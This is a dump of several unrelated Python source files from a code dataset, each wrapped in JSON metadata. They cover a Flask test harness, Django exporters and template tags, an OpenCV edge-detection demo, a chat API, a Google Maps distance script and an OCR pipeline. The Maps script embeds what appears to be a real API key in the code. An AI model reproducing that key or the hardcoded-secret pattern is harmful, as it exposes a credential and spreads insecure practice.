You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom alembic.util import CommandError\nfrom flask import json\nimport flask_migrate\nimport os\nfrom unittest2.case import TestCase\n\nfrom collector.api.app import app\nfrom collector.api.app import db\nfrom collector.api.log import init_logger\n\n\nflask_migrate.Migrate(app, db)\n\n# Configuring app for the test environment\napp.config.from_object('collector.api.config.Testing')\napp.config.from_envvar('COLLECTOR_SETTINGS', silent=True)\ninit_logger()\n\n\nclass BaseTest(TestCase):\n\n    def setUp(self):\n        self.client = app.test_client()\n\n    def post(self, url, data):\n        return self.client.post(url, data=json.dumps(data),\n                                content_type='application/json')\n\n    def patch(self, url, data):\n        return self.client.patch(url, data=json.dumps(data),\n                                 content_type='application/json')\n\n    def put(self, url, data):\n        return self.client.put(url, data=json.dumps(data),\n                               content_type='application/json')\n\n    def get(self, url, data):\n        return self.client.get(url, data=json.dumps(data),\n                               content_type='application/json')\n\n    def delete(self, url):\n        return self.client.delete(url, content_type='application/json')\n\n    def check_response_ok(self, resp, codes=(200, 201)):\n        self.assertIn(resp.status_code, codes)\n        d = json.loads(resp.data)\n        self.assertEqual('ok', d['status'])\n\n    def check_response_error(self, resp, code):\n        self.assertEqual(code, resp.status_code)\n        d = json.loads(resp.data)\n        self.assertEqual('error', d['status'])\n\n\nclass DbTest(BaseTest):\n\n    def get_migrations_dir(self):\n        return os.path.join(os.path.dirname(__file__),\n                            '..', 'api', 'db', 'migrations')\n\n    def setUp(self):\n        super(DbTest, self).setUp()\n\n        # Cleaning all changes from the previous test\n        db.session.rollback()\n\n        directory = self.get_migrations_dir()\n        with app.app_context():\n            try:\n                flask_migrate.downgrade(directory=directory,\n                                        revision='base')\n            except CommandError as e:\n                app.logger.debug(\"DB migration downgrade failed: %s\", e)\n                self.clean_db()\n            flask_migrate.upgrade(directory=directory)\n\n    def clean_db(self):\n        app.logger.debug(\"Cleaning DB without Alembic\")\n\n        # Removing tables\n        tables = db.session.execute(\n            \"SELECT table_name FROM information_schema.tables \"\n            \"WHERE table_schema = 'public'\")\n        table_names = list(item[0] for item in tables)\n        if table_names:\n            app.logger.debug(\"Removing tables: %s\", table_names)\n            db.session.execute(\n                \"DROP TABLE {0} CASCADE\".format(','.join(table_names)))\n\n        # Removing sequences\n        sequence_names = list(item[0] for item in db.session.execute(\n            \"SELECT relname FROM pg_class WHERE relkind='S'\"))\n        if sequence_names:\n            app.logger.debug(\"Removing sequences: %s\", sequence_names)\n            db.session.execute(\n                \"DROP SEQUENCE {0}\".format(','.join(sequence_names)))\n\n        # Removing enums\n        enums = db.session.execute(\n            \"SELECT t.typname FROM pg_type t JOIN pg_catalog.pg_namespace n \"\n            \"ON n.oid = t.typnamespace WHERE n.nspname='public'\")\n        enum_names = list(item[0] for item in enums)\n        if enum_names:\n            app.logger.debug(\"Removing types: %s\", enum_names)\n            db.session.execute(\n                \"DROP TYPE 
{0}\".format(','.join(enum_names)))\n\n # Committing DDL changes\n db.session.commit()\n","sub_path":"collector/collector/test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"309967391","text":"from devmaua.src.enum.tipo_sala import TipoSala\nfrom devmaua.src.enum.campus import Campus\n\nfrom pydantic import BaseModel, validator, root_validator\n\n\nclass Sala(BaseModel):\n bloco: str\n numeroDaSala: int\n tipo: list[TipoSala]\n campus: Campus\n \n @root_validator\n def bloco_is_valid(cls, values):\n campus = values.get('campus')\n bloco = values.get('bloco').upper()\n if campus == Campus.SCS:\n blocos_validos = ['A', 'B', 'C', 'D', 'E', 'F',\n 'G', 'H', 'I', 'J', 'L', 'M',\n 'N', 'P', 'Q', 'R', 'S', 'U',\n 'V']\n if campus == Campus.SP:\n blocos_validos = [] #FAZER\n if bloco not in blocos_validos:\n raise ValueError('bloco invalido')\n values['bloco'] = values['bloco'].upper()\n return values\n \n @validator('numeroDaSala')\n def numero_is_valid(cls, v):\n if v < 1:\n raise ValueError('numero de sala invalido')\n return v\n \n @validator('tipo', check_fields=False)\n def tipo_is_empty(cls, v):\n if len(v) == 0:\n raise ValueError('tipo de sala is empty')\n return v","sub_path":"devmaua/src/models/sala.py","file_name":"sala.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"166303918","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nimg = cv2.imread('lenacolor.png',0)\n# 找水平邊緣用的kernel\nkernel = np.array([[-1,-2, -1], [0,0,0], [1,2,1]],dtype=np.int8)\nw, h = img.shape\n\no1 = np.zeros((w,h), dtype=np.uint8)\no2 = np.zeros((w,h), dtype=np.uint8)\na = 3\nq = 202\nb = 5\nfor x in range(w-a+1):\n for y in range(h-a+1):\n temp = np.sum(img[x:x+a, y:y+a] * kernel)\n temp2 = np.sum(img[x:x+a, y:y+a] * kernel.T)\n if temp >=0 and temp <=255:\n o1[x+1,y+1] = temp\n elif temp < 0:\n o1[x+1,y+1] = 0\n elif temp > 255:\n o1[x+1,y+1] = 255\n o2[x+1,y+1] = abs(temp2) if abs(temp2) <= 255 else 255\n\n# ddepth=-1 則是運算後原始值(含負值) 將>255 的像素通通設定255 <0通通設為0\n# dx=0, dy=1 是尋找水平向的邊緣\nimg2 = cv2.Sobel(img, ddepth=-1, dx=0, dy=1)\n\n# dx=1, dy=0 是尋找垂直向的邊緣\n# ddepth=cv2.CV_64F 則是先保留運算後原始值(含負值)不做更動\n# 搭配上convertScaleAbs則是將負值變號 若原本<-255變號後會>255 則取255\nimg3 = cv2.Sobel(img, ddepth=cv2.CV_64F, dx=1, dy=0)\nimg3 = cv2.convertScaleAbs(img3)\n\ncv2.imshow('o1', o1)\ncv2.imshow('img2', img2)\ncv2.imshow('o2', o2)\ncv2.imshow('img3', img3)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n# o = cv2.imread('sobel4.bmp', cv2.IMREAD_GRAYSCALE)\n# #sobel dx dy皆=1 是找出角落點 所以一次sobel只能找水平或垂直其中一種邊緣\n# 純黑白若有長條水平/垂直邊要用ddepth=cv2.CV_64F 不然會自動捨棄負值(黑到白的部分)少一側的邊 \n# 所以要轉f64容納負值再轉絕對值,因此要分兩次(水平、垂直)做再加在一起\n# sobelx = cv2.Sobel(o, ddepth=cv2.CV_64F, dx=1, dy=0)\n# sobelx = np.absolute(sobelx)\n# sobely = cv2.Sobel(o, ddepth=cv2.CV_64F, dx=0, dy=1)\n# sobely = np.absolute(sobely) # 也可以用cv2.convertScaleAbs(sobely)\n# sobel_final = cv2.addWeighted(sobelx, 1, sobely, 1, 0)\n# cv2.imshow('o', o)\n# cv2.imshow('x', sobel_final)\n# cv2.waitKey()\n# cv2.destroyAllWindows()","sub_path":"影像處理/cv2_sobel.py","file_name":"cv2_sobel.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"316456869","text":"toDoList = []\n\ndef doList():\n if toDoList != []:\n print('Tasks to do: ')\n for task in range(len(toDoList)):\n if task == 
0:\n print(' - ' + str((task) + 1) + ('st') + '. ' + toDoList[task])\n elif task == 1:\n print(' - ' + str((task) + 1) + ('nd') + '. ' + toDoList[task])\n elif task == 2:\n print(' - ' + str((task) + 1) + ('rd') + '. ' + toDoList[task])\n elif task >= 3:\n print(' - ' + str((task) + 1) + ('th') + '. ' + toDoList[task])\n else:\n print('Congratulations, you have done everything. Now you can grab some snacks and play video games all day long.')\nsuffixes = ['st', 'nd', 'rd']\n\nwhile True:\n suffix = len(toDoList) < 3 and suffixes[len(toDoList)] or 'th'\n print('Enter ' + str(len(toDoList) + 1) + suffix + ' task you have to do today (leave empty place if list is done).')\n\n task = input()\n if task == '':\n break\n toDoList = toDoList + [task]\n\ndoList()\nwhile toDoList != []:\n done = input('What have you done already? ' )\n if done in toDoList:\n toDoList.remove(done)\n doList()\n \n elif done not in toDoList:\n print(str(done) + ' is not on your list.')\n doList()\n continue\n","sub_path":"toDoList.py","file_name":"toDoList.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"385681779","text":"#coding:utf-8\n\nimport sys\n\"\"\"\n\nmessage specification:\n\n[ver][reserved][type/filter][body]\n ver (1) : version , high/low (0.1 -> 0x01, 1.2 -> 0x12)\n reserved(3) :\n type/filter(40) : head part\n body(N) : user-data\n\n\"\"\"\nCongoRiver = '1000' #\n\nclass NetworkPayload(object):\n MIN_SIZE = 44\n VERSION = b'\\x15'\n BODY_JSON = b'\\0'\n BODY_PICKLE = b'\\x01'\n def __init__(self):\n self.ver = NetworkPayload.VERSION\n self.encoding = NetworkPayload.BODY_JSON\n self.reserved = b'\\0'*2\n self.head = b'\\0'*40\n self.body = b''\n\n def marshall(self):\n # if sys.version_info.major == 2:\n return self.ver + self.encoding + self.reserved + self.head + self.body\n\n\n @staticmethod\n def parse(data):\n if len(data) < NetworkPayload.MIN_SIZE:\n return None\n packet = NetworkPayload()\n packet.ver = data[:1]\n packet.encoding = data[1:2]\n packet.reserved = data[2:4]\n packet.head = data[4:NetworkPayload.MIN_SIZE]\n packet.body = data[NetworkPayload.MIN_SIZE:]\n return packet\n\n @staticmethod\n def for_message(ver=b'',reserved=b'',head=b'',body=b'',encoding='json'):\n if sys.version_info.major == 3:\n if isinstance(body,str):\n body = body.encode()\n if isinstance(ver,str):\n ver = ver.encode()\n if isinstance(reserved,str):\n reserved = reserved.encode()\n if isinstance(head,str):\n head = head.encode()\n\n np = NetworkPayload()\n if encoding =='pickle':\n np.encoding = NetworkPayload.BODY_PICKLE\n\n if ver: np.ver = ver\n if reserved:\n np.reserved = reserved[:2] + b'\\0'*(2-len(reserved))\n if head:\n np.head = head[:40] + b'\\0'*(40-len(head))\n if body: np.body = body\n return np\n\ndef for_subscribe_address(topic):\n np = NetworkPayload()\n return np.ver + np.reserved + topic\n","sub_path":"congoriver/bowl.py","file_name":"bowl.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"291738103","text":"import json\nimport requests\nimport urllib\nimport urllib3\nimport source\nimport polycoder\n\nmaps_key = 'AIzaSyAs5sA8X7MR-vbuNNxfJ4a-xSiUeOLtg-U'\n\n## INPUT TYPE: list, list\n## DESCRIPTION: The lists must contain the coordinates of locations.\n\ndef caller(current, destination):\n unit = 'imperial'\n url = 'https://maps.googleapis.com/maps/api/distancematrix/'\n out_format = 'json'\n lang = 
'en'\n    origin_coordinates, destination_coordinates = [], []\n    for coordinates in current:\n        coordinates_list = coordinates.split(',')\n        origin_coordinates.append(str(coordinates_list[0]) + ',' + str(coordinates_list[1]))\n    for coordinates in destination:\n        coordinates_list = coordinates.split(',')\n        destination_coordinates.append(str(coordinates_list[0]) + ',' + str(coordinates_list[1]))\n    poly_origin = (polycoder.super_encoder(origin_coordinates))\n    poly_destination = (polycoder.super_encoder(destination_coordinates))\n    add = 'units=' + unit + '&' + 'origins=' + 'enc:' + poly_origin + ':' + '&' + 'destinations=' + 'enc:' + poly_destination + ':' + '&' + 'language=' + lang + '&' + 'key=' + str(maps_key)\n##    string_request = url + out_format + '?' + source.http_string_convertor(add)\n    request = url + out_format + '?' + add\n    response = requests.get(request)\n    response_dict = response.json()\n    return response_dict\n\ndef time_calc(response):\n    num_sec = response ['rows'] [0] ['elements'] [0] ['duration'] ['value']\n    minutes, seconds = second_splitter(num_sec)\n    return (minutes, seconds)\n\ndef second_splitter(num_sec):\n    minutes = num_sec // 60\n    seconds = num_sec % 60\n    return (minutes, seconds)\n\ndef independent_response():\n    current = input(\"Enter the coordinates of the origin: \")\n    destination = input(\"Enter the coordinates of the destination: \")\n    # caller() expects lists of \"lat,lng\" coordinate strings\n    response = caller([current], [destination])\n    minutes, seconds = time_calc(response)\n    print (\"It would take\", minutes, \"minutes and\", seconds, \"seconds to drive from the origin to the destination.\")\n\n##def caller(current, destination):\n##    response = distance_calc(current, destination)\n##    minutes, seconds = time_calc(response)\n##    return (minutes, seconds)\n","sub_path":"maps_distance_api.py","file_name":"maps_distance_api.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} {"seq_id":"609089501","text":"import json\nfrom collections import OrderedDict\nfrom io import BytesIO\nfrom typing import Tuple\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.staticfiles import finders\nfrom django.core.files import File\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom django.db.models import Exists, OuterRef\nfrom django.db.models.functions import Coalesce\nfrom django.utils.translation import ugettext as _\nfrom jsonfallback.functions import JSONExtract\nfrom PyPDF2 import PdfFileMerger\nfrom reportlab.lib import pagesizes\nfrom reportlab.pdfgen import canvas\n\nfrom pretix.base.exporter import BaseExporter\nfrom pretix.base.i18n import language\nfrom pretix.base.models import Order, OrderPosition\nfrom pretix.base.pdf import Renderer\nfrom pretix.base.services.orders import OrderError\nfrom pretix.base.settings import PERSON_NAME_SCHEMES\nfrom pretix.plugins.badges.models import BadgeItem, BadgeLayout\n\n\ndef _renderer(event, layout):\n    if layout is None:\n        return None\n    if isinstance(layout.background, File) and layout.background.name:\n        bgf = default_storage.open(layout.background.name, \"rb\")\n    else:\n        bgf = open(finders.find('pretixplugins/badges/badge_default_a6l.pdf'), \"rb\")\n    return Renderer(event, json.loads(layout.layout), bgf)\n\n\ndef render_pdf(event, positions):\n    Renderer._register_fonts()\n\n    renderermap = {\n        bi.item_id: _renderer(event, bi.layout)\n        for bi in BadgeItem.objects.select_related('layout').filter(item__event=event)\n    }\n    
try:\n default_renderer = _renderer(event, event.badge_layouts.get(default=True))\n except BadgeLayout.DoesNotExist:\n default_renderer = None\n merger = PdfFileMerger()\n\n any = False\n for op in positions:\n r = renderermap.get(op.item_id, default_renderer)\n if not r:\n continue\n any = True\n\n with language(op.order.locale):\n buffer = BytesIO()\n p = canvas.Canvas(buffer, pagesize=pagesizes.A4)\n r.draw_page(p, op.order, op)\n p.save()\n outbuffer = r.render_background(buffer, 'Badge')\n merger.append(ContentFile(outbuffer.read()))\n\n outbuffer = BytesIO()\n merger.write(outbuffer)\n merger.close()\n outbuffer.seek(0)\n if not any:\n raise OrderError(_(\"None of the selected products is configured to print badges.\"))\n return outbuffer\n\n\nclass BadgeExporter(BaseExporter):\n identifier = \"badges\"\n verbose_name = _(\"Attendee badges\")\n\n @property\n def export_form_fields(self):\n name_scheme = PERSON_NAME_SCHEMES[self.event.settings.name_scheme]\n d = OrderedDict(\n [\n ('items',\n forms.ModelMultipleChoiceField(\n queryset=self.event.items.annotate(\n no_badging=Exists(BadgeItem.objects.filter(item=OuterRef('pk'), layout__isnull=True))\n ).exclude(no_badging=True),\n label=_('Limit to products'),\n widget=forms.CheckboxSelectMultiple(\n attrs={'class': 'scrolling-multiple-choice'}\n ),\n initial=self.event.items.filter(admission=True)\n )),\n ('include_pending',\n forms.BooleanField(\n label=_('Include pending orders'),\n required=False\n )),\n ('include_addons',\n forms.BooleanField(\n label=_('Include add-on or bundled positions'),\n required=False\n )),\n ('order_by',\n forms.ChoiceField(\n label=_('Sort by'),\n choices=[\n ('name', _('Attendee name')),\n ('code', _('Order code')),\n ] + ([\n ('name:{}'.format(k), _('Attendee name: {part}').format(part=label))\n for k, label, w in name_scheme['fields']\n ] if settings.JSON_FIELD_AVAILABLE and len(name_scheme['fields']) > 1 else []),\n )),\n ]\n )\n return d\n\n def render(self, form_data: dict) -> Tuple[str, str, str]:\n qs = OrderPosition.objects.filter(\n order__event=self.event, item_id__in=form_data['items']\n ).prefetch_related(\n 'answers', 'answers__question'\n ).select_related('order', 'item', 'variation', 'addon_to')\n\n if not form_data.get('include_addons'):\n qs = qs.filter(addon_to__isnull=True)\n\n if form_data.get('include_pending'):\n qs = qs.filter(order__status__in=[Order.STATUS_PAID, Order.STATUS_PENDING])\n else:\n qs = qs.filter(order__status__in=[Order.STATUS_PAID])\n\n if form_data.get('order_by') == 'name':\n qs = qs.order_by('attendee_name_cached', 'order__code')\n elif form_data.get('order_by') == 'code':\n qs = qs.order_by('order__code')\n elif form_data.get('order_by', '').startswith('name:'):\n part = form_data['order_by'][5:]\n qs = qs.annotate(\n resolved_name=Coalesce('attendee_name_parts', 'addon_to__attendee_name_parts', 'order__invoice_address__name_parts')\n ).annotate(\n resolved_name_part=JSONExtract('resolved_name', part)\n ).order_by(\n 'resolved_name_part'\n )\n\n outbuffer = render_pdf(self.event, qs)\n return 'badges.pdf', 'application/pdf', outbuffer.read()\n","sub_path":"src/pretix/plugins/badges/exporters.py","file_name":"exporters.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"251568006","text":"def ack(m,n):\n m = int(m)\n n = int(n)\n ans = 0\n if m == 0:\n ans = n + 1\n elif m > 0 and n == 0:\n ans = ack(m-1,1)\n elif m > 0 and n > 0:\n temp = ack(m,n - 1)\n ans = ack(m 
- 1,temp)\n    else:\n        return ans\n    return ans\n\nm = input(\"Enter value for m:\")\nn = input(\"Enter value for n:\")\nprint(ack(m,n))\n    \n","sub_path":"LAB1TASK11.py","file_name":"LAB1TASK11.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} {"seq_id":"588608044","text":"# Convenience functions to make the django template syntax\n# work better with some Freemarker idioms we're dependent on\n#\n# The matched_inclusion_tag code is a mix of inclusion_tag and the\n# django documentation on parsing matched tags\n# The kwargs parsing is lifted from the url built in tag\n\n\nfrom inspect import getargspec\nimport re\n\nfrom django import template\nfrom django.template.context import Context\nfrom django.utils.functional import curry\nfrom django.utils.itercompat import is_iterable\n\n# Regex for token keyword arguments\nkwarg_re = re.compile(r\"(?:(\\w+)=)?(.+)\")\n\ndef matched_tag_compiler(params, defaults, name, node_class, parser, token):\n    \"Returns a template.Node subclass.\"\n    bits = token.split_contents()[1:]\n    bmax = len(params)\n    def_len = defaults and len(defaults) or 0\n    bmin = bmax - def_len\n    if(len(bits) < bmin or len(bits) > bmax):\n        if bmin == bmax:\n            message = \"%s takes %s arguments\" % (name, bmin)\n        else:\n            message = \"%s takes between %s and %s arguments\" % (name, bmin, bmax)\n        raise template.TemplateSyntaxError(message)\n\n    args = []\n    kwargs = {}\n    if len(bits):\n        for bit in bits:\n            match = kwarg_re.match(bit)\n            if not match:\n                raise template.TemplateSyntaxError(\"Malformed arguments to url tag\")\n            key, value = match.groups()\n            if key:\n                kwargs[key] = value\n            else:\n                args.append(value)\n\n    nodelist = parser.parse(('end%s' % name,))\n    parser.delete_first_token() # remove the {% endfoo %}\n    return node_class(args, kwargs, nodelist)\n\n\ndef matched_inclusion_tag(library, file_name, context_class=Context, takes_context=False):\n    def dec(func):\n        params, xx, xxx, defaults = getargspec(func)\n        if takes_context:\n            if params[0] == 'context':\n                params = params[1:]\n            else:\n                raise template.TemplateSyntaxError(\"Any tag function decorated with takes_context=True must have a first argument of 'context'\")\n\n        class InclusionNode(template.Node):\n            def __init__(self, args, kwargs, nested_nodes):\n                self.args = map(template.Variable, args)\n                self.kwargs = dict([(k, template.Variable(v))\n                                    for k, v in kwargs.items()])\n                self.nested_nodes = nested_nodes\n\n            def render(self, context):\n                context.push()\n                context['True'] = True\n                context['False'] = False\n                context['None'] = None\n\n                resolved_args = [var.resolve(context) for var in self.args]\n                resolved_kwargs = dict([(str(k), v.resolve(context))\n                                        for k, v in self.kwargs.items()])\n                context.pop()\n\n                if takes_context:\n                    args = [context] + resolved_args\n                else:\n                    args = resolved_args\n\n                dictionary = func(*args, **resolved_kwargs)\n                dictionary['nested'] = self.nested_nodes.render(context)\n\n                if not getattr(self, 'nodelist', False):\n                    from django.template.loader import get_template, select_template\n                    if not isinstance(file_name, basestring) and is_iterable(file_name):\n                        t = select_template(file_name)\n                    else:\n                        t = get_template(file_name)\n                    self.nodelist = t.nodelist\n                new_context = context_class(dictionary, autoescape=context.autoescape)\n                # Copy across the CSRF token, if present, because inclusion\n                # tags are often used for forms, and we need instructions\n                # for using CSRF protection to be as simple as possible.\n                csrf_token = context.get('csrf_token', None)\n                if csrf_token is not None:\n                    
new_context['csrf_token'] = csrf_token\n return self.nodelist.render(new_context)\n\n compile_func = curry(matched_tag_compiler, params, defaults, getattr(func, \"_decorated_function\", func).__name__, InclusionNode)\n compile_func.__doc__ = func.__doc__\n library.tag(getattr(func, \"_decorated_function\", func).__name__, compile_func)\n return func\n return dec\n\n\n","sub_path":"eliza/ntm/templatetags/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"139205913","text":"from django.conf.urls import url\nfrom cart.views import CartInfoView, CartAddView, CartUpdateView, CartDeleteView\n\nurlpatterns = [\n url(r'^show$', CartInfoView.as_view(), name='show'), # 购物车页面显示\n url(r'^add$', CartAddView.as_view(), name='add'), # 购物车添加\n url(r'^update$', CartUpdateView.as_view(), name='update'), # 购物车更新\n url(r'^delete$', CartDeleteView.as_view(), name='delete'), # 删除购物车记录\n\n]\n","sub_path":"dailyfresh/apps/cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"122371425","text":"from flask import Blueprint,request,jsonify,send_file\nfrom serv import get_set_anthing\nfrom settings import MONGO_DB\nfrom settings import RET\nfrom settings import VOICE_PATH\nfrom baidu_aip import speech\nfrom bson import ObjectId\nimport os\n\nchats = Blueprint(\"chats\",__name__)\n\n@chats.route(\"/recv_chat\",methods=[\"POST\"])\ndef recv_chat():\n toy_id = request.form.get(\"toy_id\")\n user_id = request.form.get(\"user_id\")\n user_list = [toy_id, user_id]\n \n # count = 3 [app,self,app]\n recv_count,user_id2 = get_set_anthing.redis_get_one(toy_id,user_id)\n if user_id2:\n user_list = [toy_id, user_id2]\n recv_list = []\n\n chat_window = MONGO_DB.chats.find_one({\"user_list\": {\"$all\": user_list}})\n for chat in reversed(chat_window.get(\"chat_list\")):\n if chat.get(\"sender\") != toy_id:\n recv_list.append(chat)\n if len(recv_list) >= recv_count:\n break\n xxtx = speech.get_remark(toy_id, user_id2)\n recv_list.append({\"sender\":user_id2,\"recv\":toy_id,\"content\":xxtx})\n return jsonify(recv_list)#: [7,5,3,{content:\"你有来自xxx的消息\"}]\n\n@chats.route(\"/chat_list\",methods=[\"POST\"])\ndef chat_list():\n chat_id = request.form.get(\"chat_id\")\n to_user = request.form.get(\"user_id\")\n from_user = request.form.get(\"toy_id\")\n \n get_set_anthing.redis_get_one(to_user,from_user)\n\n chat_window = MONGO_DB.chats.find_one({\"_id\":ObjectId(chat_id)})\n \n RET[\"code\"] = 0\n RET[\"msg\"] = \"查询消息\"\n RET[\"data\"] = chat_window.get(\"chat_list\")\n \n return jsonify(RET)\n\n@chats.route(\"/get_msg_count\",methods=[\"POST\"])\ndef get_msg_count():\n user_id = request.form.get(\"user_id\")\n user_msg = get_set_anthing.redis_get_count(user_id)\n \n RET[\"code\"] = 0\n RET[\"msg\"] = \"未读消息查询\"\n RET[\"data\"] = user_msg\n \n return jsonify(RET)","sub_path":"第9部分-flask+智能玩具(火龙果)/day129/今日代码/TuXingSun/serv/chats.py","file_name":"chats.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"241327433","text":"import io\nfrom PIL import Image, ImageSequence\nfrom pdfplumber.pdf import PDF\nfrom pdf2image import convert_from_bytes\nimport numpy as np\nfrom IDP_pipeline.ocr.utils import cvutils\nfrom IDP_pipeline.ocr.ocr_entities.rzt_ocr.text_patch_detector import 
RZTTextPatchDetector\nfrom IDP_pipeline.ocr.ocr_entities.tesseract.tesseract_ocr_entity import Tesseract_OCR\n\nfrom IDP_pipeline.runner.rzt.Assemble_Evidences import assemble_evidences\nfrom IDP_pipeline.hypotheses.ocr_pattern_hypothesis.RND.Bordered_table import Bordered_Table\nfrom copy import deepcopy\n\nfrom ocr_pattern_hypothesis.utils import frame_utils\nfrom ocr_pattern_hypothesis.frames.basic_frames import Word\n\n# STRUCTURE FRAMES\nfrom ocr_pattern_hypothesis.frames.structure.engine import StructureEngine\nfrom ocr_pattern_hypothesis.frames.structure.text import Paragraph, TextLine\n\n# CONTENT FRAMES\nfrom ocr_pattern_hypothesis.frames.content.engine import ContentEngine\nfrom ocr_pattern_hypothesis.frames.content.where_rules import where_page, where_position, close_by\nfrom ocr_pattern_hypothesis.frames.content.what_rules import MatchSRL, LookUp, HasKey, Near\nfrom ocr_pattern_hypothesis.frames.content.what_group_rules import GrMatchSRL, GrLookUp, GrHasKey, \\\n    GrNear\n\nisland_alg = \"CONNECTED_COMPONENT\"\n# island_alg= \"CONTOUR\"\n# island_alg =\"HISTOGRAM\"\nroot_folder = \"/home/rztuser/IDP/run_result/\"\nimage_folder = \"/home/rztuser/IDP/images/\"\nrule_json = \"/home/rztuser/IDP/Jsons/att_rules.json\"\nrun_evidence = False\nrequired_evidences = [\"tesseract\", \"rzt_ocr\"]\n\n\ndef tesseract_evidence(img):\n    # tesseract_words, tesseract_content = Tesseract_OCR.get_pyocr_words_strings(text_patch=img)\n    # res = {\n    #     'tesseract_words': tesseract_words,\n    #     'tesseract_content': tesseract_content\n    # }\n    # return res\n    site = 'http://192.168.60.45:5000'\n    # encode the input image and post it to the remote tesseract service\n    _, img_encoded = cv2.imencode('.jpg', img)\n    response = requests.post(site + '/tesseract_evidence', data=img_encoded.tostring())\n    tesseract_json = response.json()\n    return tesseract_json\n\n\ndef write_text_on_image(img, word_patch_with_string, color=(0, 0, 0), fx=2, fy=2):\n    try:\n        word_patch_with_string = {tuple(eval(i)): j for i, j in word_patch_with_string.items()}\n    except Exception as e:\n        pass\n    new_img = np.zeros(img.shape) + 255\n    new_img = cv2.resize(new_img, (0, 0), fx=fx, fy=fy)\n    font = cv2.FONT_HERSHEY_SIMPLEX\n    for patch, text in word_patch_with_string.items():\n        cv2.putText(new_img, text, (int(patch[1] * fx), int(patch[2] * fx)), font, 1, color, 2, cv2.LINE_AA)\n    return new_img\n\n\ndef hypothesis(evidence, image, rules):\n    s_engine = StructureEngine((\n        TextLine.generate,\n        # Paragraph.generate,\n        # Table.generate\n    ))\n    what_group_rules = {\n        'match-srl': GrMatchSRL,\n        \"lookup\": GrLookUp,\n        \"has-key\": GrHasKey,\n        \"near\": GrNear\n    }\n\n    what_rules = {\n        'match-srl': MatchSRL,\n        \"lookup\": LookUp,\n        \"has-key\": HasKey,\n        \"near\": Near\n\n    }\n    where_rules = {\n        'page': where_page,\n        'position': where_position,\n        \"close-by\": close_by\n    }\n\n    c_engine = ContentEngine(rules, what_rules, where_rules, what_group_rules)\n\n    # Load the image!\n    # print(images_folder + file_name + \".jpg\")\n    imgs = [image]\n    # print(imgs)\n    # exit()\n\n    # Get word patches!\n    word_patches_dict = {}\n    for k, v in evidence['evidence_words'].items():\n        c = v[\"assembled_result\"][0]\n        label = v[\"assembled_result\"][1]\n\n        coordinates = (\n            c[0], c[1],\n            c[2], c[3]\n        )\n        word_patches_dict[coordinates] = label\n    all_structures = []\n    for page, img in enumerate(imgs, 1):\n        try:\n            structures = s_engine.run(img, word_args=(word_patches_dict,))\n        except IndexError:\n            structures = []\n        all_structures.append(structures)\n\n    all_results = c_engine.run(imgs, all_structures)\n\n    final_data = []\n    for page, img in zip(all_results, 
imgs):\n        temp = []\n        for frame in page:\n            temp.append(\n                [(frame.coordinates[0], frame.coordinates[1]), frame.name, Word.join(*frame.contains['words']),\n                 frame.confidence])\n\n        final_data.append(temp)\n    return (final_data)\n\n\ndef tiff_to_jpg(binary_data: str):\n    im = Image.open(io.BytesIO(binary_data))\n    im_arr = []\n    for i, page in enumerate(ImageSequence.Iterator(im)):\n        im_arr.append(np.asarray(page.convert('RGB')))\n    return im_arr\n\n\ndef fetch_words(binary_input, filepath):\n    def get_text_patch_from_image(image):\n        if island_alg == \"CONNECTED_COMPONENT\":\n            text_patch_coords = RZTTextPatchDetector(page_image=image).detect_using_connected_components()\n        elif island_alg == \"CONTOUR\":\n            text_patch_coords = RZTTextPatchDetector(page_image=image).detect_using_contours()\n        else:\n            text_patch_coords = RZTTextPatchDetector(page_image=image).detect_using_histogram()\n\n        text_patches = [image[t[1]:t[3], t[0]:t[2]].copy() for t in text_patch_coords]\n\n        text_patch_list = []\n        for e1, tp in enumerate(text_patches):\n            if tp is None or tp.shape[0] == 0 or tp.shape[1] == 0:\n                continue\n            orientation = cvutils.get_text_orientation_using_word_width(tp)\n            text = text_patch_coords[e1]\n            if orientation == \"VERTICAL\":\n                text_patch_key = str(text) + \"_V\"\n            else:\n                text_patch_key = str(text) + \"_H\"\n            text_patch_list.append(text_patch_key)\n\n        return text_patch_list\n\n    document_name = filepath.split('/')[-1]\n    document_name_without_ext = document_name.rsplit('.', 1)[0]\n    extension = document_name.split('.')[-1].lower()\n    result_dict = {}\n    if extension == 'tif' or extension == 'tiff':\n        images = tiff_to_jpg(binary_input)\n\n        for e, image in enumerate(images):\n            page_filename = document_name_without_ext + \"_page_\" + 